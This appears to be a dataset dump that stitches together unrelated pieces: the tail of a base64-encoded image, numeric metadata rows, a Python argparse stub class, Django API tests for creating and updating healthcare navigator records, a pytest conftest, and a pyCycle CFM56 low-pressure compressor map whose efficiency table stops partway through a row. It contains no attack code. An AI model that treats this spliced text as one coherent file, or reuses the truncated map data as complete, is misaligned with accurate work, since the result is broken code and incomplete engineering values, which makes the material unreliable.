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""" | 24,847 | 24,847 | 0.956132 | 1,059 | 24,847 | 22.432483 | 0.970727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178587 | 0.00008 | 24,847 | 1 | 24,847 | 24,847 | 0.777581 | 0 | 0 | 0 | 0 | 1 | 0.999195 | 0.999195 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ecba6c7b5e6388c107587b5e238eb5dca70956b9 | 229 | py | Python | controllers/__init__.py | jadson179/hacs-cli | 52a06b970f24ccdb64e2459acf4f53402d5d3bf2 | [
"Unlicense"
] | null | null | null | controllers/__init__.py | jadson179/hacs-cli | 52a06b970f24ccdb64e2459acf4f53402d5d3bf2 | [
"Unlicense"
] | null | null | null | controllers/__init__.py | jadson179/hacs-cli | 52a06b970f24ccdb64e2459acf4f53402d5d3bf2 | [
"Unlicense"
] | 1 | 2021-11-30T18:41:36.000Z | 2021-11-30T18:41:36.000Z | import argparse
class IBasic:
def add (self,args:argparse.Namespace) -> None:
pass
def remove (self,args:argparse.Namespace) -> None:
pass
def list (self,args:argparse.Namespace) -> None:
pass | 25.444444 | 54 | 0.637555 | 28 | 229 | 5.214286 | 0.464286 | 0.164384 | 0.328767 | 0.513699 | 0.719178 | 0.719178 | 0.493151 | 0 | 0 | 0 | 0 | 0 | 0.253275 | 229 | 9 | 55 | 25.444444 | 0.853801 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0.375 | 0.125 | 0 | 0.625 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
ecc658c75de9a8c421dffcd38aaff6d170871884 | 15,432 | py | Python | picbackend/tests/views/v2/navigators_views_tests.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
] | null | null | null | picbackend/tests/views/v2/navigators_views_tests.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
] | null | null | null | picbackend/tests/views/v2/navigators_views_tests.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
] | null | null | null | from django.test import TestCase
from .base_v2_api_tests import BaseConsumerNavigatorsMetricsTests
from .base_v2_api_tests import BaseV2RqstTests
import json
class NavigatorAPITests(TestCase, BaseConsumerNavigatorsMetricsTests):
def setUp(self):
self.base_url += "navigators/"
def test_add_navigator_view(self):
post_data = {
"first_name": "sdfdsfafassadr",
"last_name": "Marlsasdfsdfdsfdsfdda",
"email": "donadsfdsfa@patfdsfdie.org",
"type": "Navigator",
"county": "Montgomery",
"mpn": "Cook",
"add_base_locations": ['Lincoln Belmont Library', 'Thorek Memorial Hospital'],
'add_healthcare_locations_worked': [
{
'name': 'Edward Hospital & Immediate Careasdss',
'state_province': 'not available'
}
],
'add_healthcare_service_expertises': [
'bariatrics',
],
'add_insurance_carrier_specialties': [
{
'name': 'Health Alliance Medical Plans, Inc.',
'state_province': 'il'
},
],
'add_approved_clients_for_case_management': [
1
],
"create_resume_row": {
"profile_description": "apple",
"create_education_rows": [
{
"school": "easy",
"major": "peasy",
"degree_type": "masters"
},
{
"school": "lemon",
"major": "squeezy",
"degree_type": "masters"
},
],
"create_job_rows": [
{
"title": "easy",
"company": "peasy",
"description": "masters"
},
{
"title": "lemon",
"company": "squeezy",
"description": "masters"
},
],
},
"address_line_1": "",
"address_line_2": "",
"city": "",
"state_province": "",
"zipcode": "",
"phone": "2813307004",
"reported_region": "cook",
"video_link": "https://www.twitch.tv/videos/239858398",
"navigator_organization": "sljidsjflksa",
"db_action": "create",
}
post_json = json.dumps(post_data)
response = self.client_object.put(self.base_url, post_json, content_type="application/json")
# Test for a valid reponse code (200)
self.assertEqual(response.status_code, 200)
response_json = response.content.decode('utf-8')
response_data = json.loads(response_json)
# Test for valid decoded json data from response body
self.assertIsNotNone(response_data)
status_data = response_data["Status"]
# Test decoded JSON data for "Status" key
self.assertIsNotNone(status_data)
self.assertNotIn("Errors", status_data)
self.assertEqual(status_data["Error Code"], 0)
self.assertIn("Data", response_data)
self.assertNotEqual(len(response_data["Data"]), 0)
# Test decoded JSON data for correct API version
self.assertEqual(status_data["Version"], 2.0)
# Test decoded JSON data for non empty "Next Available Appointments" data
staff_data = response_data["Data"]
self.assertIn("row", staff_data)
if "row" in staff_data:
db_row = staff_data['row']
self.assertEqual(
db_row['first_name'],
post_data['first_name'],
"row name: {}, request name: {}".format(db_row['first_name'], post_data['first_name'])
)
self.assertEqual(
len(db_row['base_locations']),
2,
"row base locations count: {}".format(len(db_row['base_locations']))
)
self.assertEqual(
len(db_row["approved_clients_for_case_management"]),
1,
"row approved_clients_for_case_management count: {}".format(len(db_row["approved_clients_for_case_management"]))
)
self.assertEqual(
len(db_row['healthcare_locations_worked']),
1,
"row healthcare_locations_worked count: {}".format(len(db_row['healthcare_locations_worked']))
)
self.assertEqual(
len(db_row['insurance_carrier_specialties']),
1,
"row insurance_carrier_specialties count: {}".format(len(db_row['insurance_carrier_specialties']))
)
self.assertEqual(
len(db_row['healthcare_service_expertises']),
1,
"row healthcare_service_expertises count: {}".format(len(db_row['healthcare_service_expertises']))
)
self.assertEqual(
len(db_row['resume_info']),
1,
"row resume count: {}".format(len(db_row['resume_info']))
)
def test_update_navigator_view(self):
post_data = {
"first_name": "sdfdsfafassadr",
"last_name": "Marlsasdfsdfdsfdsfdda",
"email": "donadsfdsfa@patfdsfdie.org",
"type": "Navigator",
"county": "Montgomery",
"mpn": "Cook",
"add_base_locations": ['Lincoln Belmont Library', 'Thorek Memorial Hospital'],
'add_healthcare_locations_worked': [
{
'name': 'Edward Hospital & Immediate Careasdss',
'state_province': 'not available'
}
],
'add_healthcare_service_expertises': [
'bariatrics',
],
'add_insurance_carrier_specialties': [
{
'name': 'Health Alliance Medical Plans, Inc.',
'state_province': 'il'
},
],
'add_approved_clients_for_case_management': [
1
],
"create_resume_row": {
"profile_description": "apple",
"create_education_rows": [
{
"school": "easy",
"major": "peasy",
"degree_type": "masters"
},
{
"school": "lemon",
"major": "squeezy",
"degree_type": "masters"
},
],
"create_job_rows": [
{
"title": "easy",
"company": "peasy",
"description": "masters"
},
{
"title": "lemon",
"company": "squeezy",
"description": "masters"
},
],
},
"address_line_1": "",
"address_line_2": "",
"city": "",
"state_province": "",
"zipcode": "",
"phone": "2813307004",
"reported_region": "cook",
"video_link": "https://www.twitch.tv/videos/239858398",
"navigator_organization": "sljidsjflksa",
"db_action": "update",
"id": 5,
}
post_json = json.dumps(post_data)
response = self.client_object.put(self.base_url, post_json, content_type="application/json")
# Test for a valid reponse code (200)
self.assertEqual(response.status_code, 200)
response_json = response.content.decode('utf-8')
response_data = json.loads(response_json)
# Test for valid decoded json data from response body
self.assertIsNotNone(response_data)
status_data = response_data["Status"]
# Test decoded JSON data for "Status" key
self.assertIsNotNone(status_data)
self.assertNotIn("Errors", status_data)
self.assertEqual(status_data["Error Code"], 0)
self.assertIn("Data", response_data)
self.assertNotEqual(len(response_data["Data"]), 0)
# Test decoded JSON data for correct API version
self.assertEqual(status_data["Version"], 2.0)
# Test decoded JSON data for non empty "Next Available Appointments" data
staff_data = response_data["Data"]
self.assertIn("row", staff_data)
if "row" in staff_data:
db_row = staff_data['row']
self.assertEqual(
db_row['first_name'],
post_data['first_name'],
"row name: {}, request name: {}".format(db_row['first_name'], post_data['first_name'])
)
self.assertEqual(
len(db_row['base_locations']),
2,
"row base locations count: {}".format(len(db_row['base_locations']))
)
self.assertEqual(
len(db_row["approved_clients_for_case_management"]),
1,
"row approved_clients_for_case_management count: {}".format(len(db_row["approved_clients_for_case_management"]))
)
self.assertEqual(
len(db_row['healthcare_locations_worked']),
1,
"row healthcare_locations_worked count: {}".format(len(db_row['healthcare_locations_worked']))
)
self.assertEqual(
len(db_row['insurance_carrier_specialties']),
1,
"row insurance_carrier_specialties count: {}".format(len(db_row['insurance_carrier_specialties']))
)
self.assertEqual(
len(db_row['healthcare_service_expertises']),
1,
"row healthcare_service_expertises count: {}".format(len(db_row['healthcare_service_expertises']))
)
self.assertEqual(
len(db_row['resume_info']),
1,
"row resume count: {}".format(len(db_row['resume_info']))
)
class NavigatorSignUpAPITests(TestCase, BaseV2RqstTests):
def setUp(self):
self.base_url += "navigator_sign_up/"
def test_add_navigator_view(self):
post_data = {
"first_name": "sdfdsfafassadr",
"last_name": "Marlsasdfsdfdsfdsfdda",
"email": "donadsfdsfa@patfdsfdie.org",
'add_healthcare_locations_worked': [
{
'name': 'Edward Hospital & Immediate Careasdss',
'state_province': 'not available'
}
],
'add_healthcare_service_expertises': [
'bariatrics',
],
'add_insurance_carrier_specialties': [
{
'name': 'Health Alliance Medical Plans, Inc.',
'state_province': 'il'
},
],
"create_resume_row": {
"profile_description": "apple",
"create_education_rows": [
{
"school": "easy",
"major": "peasy",
"degree_type": "masters"
},
{
"school": "lemon",
"major": "squeezy",
"degree_type": "masters"
},
],
"create_job_rows": [
{
"title": "easy",
"company": "peasy",
"description": "masters"
},
{
"title": "lemon",
"company": "squeezy",
"description": "masters"
},
],
},
"address_line_1": "",
"address_line_2": "",
"city": "",
"state_province": "",
"zipcode": "",
"phone": "2813307004",
"reported_region": "cook",
"video_link": "https://www.twitch.tv/videos/239858398",
"navigator_organization": "sakfjnlsa",
"db_action": "create",
}
post_json = json.dumps(post_data)
response = self.client_object.put(self.base_url, post_json, content_type="application/json")
# Test for a valid reponse code (200)
self.assertEqual(response.status_code, 200)
response_json = response.content.decode('utf-8')
response_data = json.loads(response_json)
# Test for valid decoded json data from response body
self.assertIsNotNone(response_data)
status_data = response_data["Status"]
# Test decoded JSON data for "Status" key
self.assertIsNotNone(status_data)
self.assertNotIn("Errors", status_data)
self.assertEqual(status_data["Error Code"], 0)
self.assertIn("Data", response_data)
self.assertNotEqual(len(response_data["Data"]), 0)
# Test decoded JSON data for correct API version
self.assertEqual(status_data["Version"], 2.0)
# Test decoded JSON data for non empty "Next Available Appointments" data
staff_data = response_data["Data"]
self.assertIn("row", staff_data)
if "row" in staff_data:
db_row = staff_data['row']
self.assertEqual(
db_row['first_name'],
post_data['first_name'],
"row name: {}, request name: {}".format(db_row['first_name'], post_data['first_name'])
)
self.assertEqual(
db_row['navigator_organization'],
post_data['navigator_organization'],
"row name: {}, request name: {}".format(db_row['navigator_organization'], post_data['navigator_organization'])
)
self.assertEqual(
len(db_row['base_locations']),
0,
"row base locations count: {}".format(len(db_row['base_locations']))
)
self.assertEqual(
len(db_row['healthcare_locations_worked']),
1,
"row healthcare_locations_worked count: {}".format(len(db_row['healthcare_locations_worked']))
)
self.assertEqual(
len(db_row['insurance_carrier_specialties']),
1,
"row insurance_carrier_specialties count: {}".format(len(db_row['insurance_carrier_specialties']))
)
self.assertEqual(
len(db_row['healthcare_service_expertises']),
1,
"row healthcare_service_expertises count: {}".format(len(db_row['healthcare_service_expertises']))
)
self.assertEqual(
len(db_row['resume_info']),
1,
"row resume count: {}".format(len(db_row['resume_info']))
)
| 36.48227 | 128 | 0.495658 | 1,314 | 15,432 | 5.547184 | 0.122527 | 0.030868 | 0.037317 | 0.046646 | 0.964467 | 0.964467 | 0.951571 | 0.943339 | 0.928248 | 0.928248 | 0 | 0.012771 | 0.391135 | 15,432 | 422 | 129 | 36.56872 | 0.762984 | 0.047952 | 0 | 0.771831 | 0 | 0 | 0.305805 | 0.116517 | 0 | 0 | 0 | 0 | 0.135211 | 1 | 0.014085 | false | 0 | 0.011268 | 0 | 0.030986 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
01cf7e3cec4eb237fb2c84b2306385c2e6676021 | 212 | py | Python | tests/conftest.py | sharebears/pulsar-forums | 6c1152a181c30bb82c49556fd072f47c2eeaf1cb | [
"MIT"
] | null | null | null | tests/conftest.py | sharebears/pulsar-forums | 6c1152a181c30bb82c49556fd072f47c2eeaf1cb | [
"MIT"
] | null | null | null | tests/conftest.py | sharebears/pulsar-forums | 6c1152a181c30bb82c49556fd072f47c2eeaf1cb | [
"MIT"
] | null | null | null | import forums
from core.conftest import * # noqa: F401, F403
from core.conftest import PLUGINS, POPULATORS
from forums.test_data import ForumsPopulator
PLUGINS.append(forums)
POPULATORS.append(ForumsPopulator)
| 26.5 | 47 | 0.825472 | 27 | 212 | 6.444444 | 0.518519 | 0.091954 | 0.183908 | 0.252874 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031746 | 0.108491 | 212 | 7 | 48 | 30.285714 | 0.888889 | 0.075472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bf180d4bfdacfad1c581f524d922c0161c8c877d | 9,276 | py | Python | pycycle/maps/CFM56_LPC_map.py | swryan/pyCycleOld | fbab35b74d0e5487abe686ae0823ff52e75afb3b | [
"Apache-2.0"
] | null | null | null | pycycle/maps/CFM56_LPC_map.py | swryan/pyCycleOld | fbab35b74d0e5487abe686ae0823ff52e75afb3b | [
"Apache-2.0"
] | null | null | null | pycycle/maps/CFM56_LPC_map.py | swryan/pyCycleOld | fbab35b74d0e5487abe686ae0823ff52e75afb3b | [
"Apache-2.0"
] | null | null | null | import numpy as np
from pycycle.maps.map_data import MapData
"""Python version of CFM56 LPC map from NPSS"""
LPCmap = MapData()
# Map design point values
LPCmap.defaults = {}
LPCmap.defaults['alphaMap'] = 0.0
LPCmap.defaults['NcMap'] = 1.00
LPCmap.defaults['PR'] = 1.969
LPCmap.defaults['RlineMap'] = 2.150
LPCmap.RlineStall = 1.0
LPCmap.alphaMap = np.array([0.000, 90.000])
LPCmap.NcMap = np.array([0.300, 0.400, 0.500, 0.600, 0.700, 0.750, 0.800, 0.850, 0.900, 0.950, 1.000, 1.050, 1.100, 1.150])
LPCmap.RlineMap = np.array([1.000, 1.200, 1.400, 1.600, 1.800, 2.000, 2.200, 2.400, 2.600, 2.800, 3.000])
LPCmap.WcMap = np.array([[[17.907, 19.339, 20.749, 22.136, 23.498, 24.833, 26.141, 27.420, 28.669, 29.887, 31.011],
[24.951, 26.742, 28.485, 30.177, 31.815, 33.397, 34.921, 36.385, 37.788, 39.128, 40.405],
[32.682, 34.715, 36.662, 38.520, 40.286, 41.958, 43.533, 45.011, 46.390, 47.669, 48.848],
[40.927, 43.115, 45.168, 47.083, 48.858, 50.492, 51.983, 53.331, 54.539, 55.607, 56.537],
[49.850, 52.122, 54.195, 56.068, 57.741, 59.215, 60.494, 61.580, 62.479, 63.197, 63.739],
[54.798, 57.066, 59.099, 60.897, 62.463, 63.800, 64.913, 65.810, 66.497, 66.983, 67.278],
[60.051, 62.252, 64.185, 65.851, 67.255, 68.405, 69.307, 69.973, 70.413, 70.638, 70.675],
[65.313, 67.427, 69.262, 70.824, 72.118, 73.153, 73.938, 74.484, 74.803, 74.907, 74.907],
[70.995, 72.902, 74.542, 75.920, 77.043, 77.920, 78.560, 78.974, 79.174, 79.198, 79.198],
[77.441, 78.904, 80.155, 81.199, 82.042, 82.690, 83.151, 83.434, 83.545, 83.548, 83.548],
[84.344, 85.211, 85.952, 86.572, 87.074, 87.460, 87.735, 87.903, 87.967, 87.968, 87.968],
[89.305, 89.687, 90.025, 90.320, 90.572, 90.783, 90.953, 91.083, 91.174, 91.227, 91.243],
[93.626, 93.712, 93.793, 93.868, 93.939, 94.004, 94.064, 94.120, 94.170, 94.216, 94.257],
[96.084, 96.074, 96.064, 96.054, 96.044, 96.033, 96.022, 96.012, 96.000, 95.989, 95.978]],
[[17.907, 19.339, 20.749, 22.136, 23.498, 24.833, 26.141, 27.420, 28.669, 29.887, 31.011],
[24.951, 26.742, 28.485, 30.177, 31.815, 33.397, 34.921, 36.385, 37.788, 39.128, 40.405],
[32.682, 34.715, 36.662, 38.520, 40.286, 41.958, 43.533, 45.011, 46.390, 47.669, 48.848],
[40.927, 43.115, 45.168, 47.083, 48.858, 50.492, 51.983, 53.331, 54.539, 55.607, 56.537],
[49.850, 52.122, 54.195, 56.068, 57.741, 59.215, 60.494, 61.580, 62.479, 63.197, 63.739],
[54.798, 57.066, 59.099, 60.897, 62.463, 63.800, 64.913, 65.810, 66.497, 66.983, 67.278],
[60.051, 62.252, 64.185, 65.851, 67.255, 68.405, 69.307, 69.973, 70.413, 70.638, 70.675],
[65.313, 67.427, 69.262, 70.824, 72.118, 73.153, 73.938, 74.484, 74.803, 74.907, 74.907],
[70.995, 72.902, 74.542, 75.920, 77.043, 77.920, 78.560, 78.974, 79.174, 79.198, 79.198],
[77.441, 78.904, 80.155, 81.199, 82.042, 82.690, 83.151, 83.434, 83.545, 83.548, 83.548],
[84.344, 85.211, 85.952, 86.572, 87.074, 87.460, 87.735, 87.903, 87.967, 87.968, 87.968],
[89.305, 89.687, 90.025, 90.320, 90.572, 90.783, 90.953, 91.083, 91.174, 91.227, 91.243],
[93.626, 93.712, 93.793, 93.868, 93.939, 94.004, 94.064, 94.120, 94.170, 94.216, 94.257],
[96.084, 96.074, 96.064, 96.054, 96.044, 96.033, 96.022, 96.012, 96.000, 95.989, 95.978]]])
LPCmap.effMap = np.array([[[.8070, .8291, .8461, .8566, .8586, .8497, .8170, .7410, .6022, .3674, .0000],
[.8230, .8454, .8628, .8741, .8775, .8708, .8419, .7732, .6477, .4372, .0916],
[.8411, .8631, .8805, .8921, .8966, .8918, .8671, .8065, .6959, .5124, .2168],
[.8565, .8783, .8957, .9077, .9131, .9099, .8883, .8338, .7340, .5696, .3083],
[.8662, .8879, .9055, .9179, .9239, .9219, .9024, .8520, .7600, .6096, .3739],
[.8699, .8917, .9093, .9218, .9281, .9265, .9080, .8598, .7721, .6297, .4089],
[.8743, .8957, .9130, .9253, .9316, .9304, .9131, .8678, .7858, .6538, .4519],
[.8836, .9026, .9179, .9287, .9342, .9331, .9183, .8804, .8128, .7065, .5485],
[.8943, .9103, .9230, .9319, .9362, .9351, .9231, .8930, .8406, .7602, .6442],
[.9060, .9169, .9253, .9310, .9334, .9321, .9236, .9036, .8703, .8211, .7529],
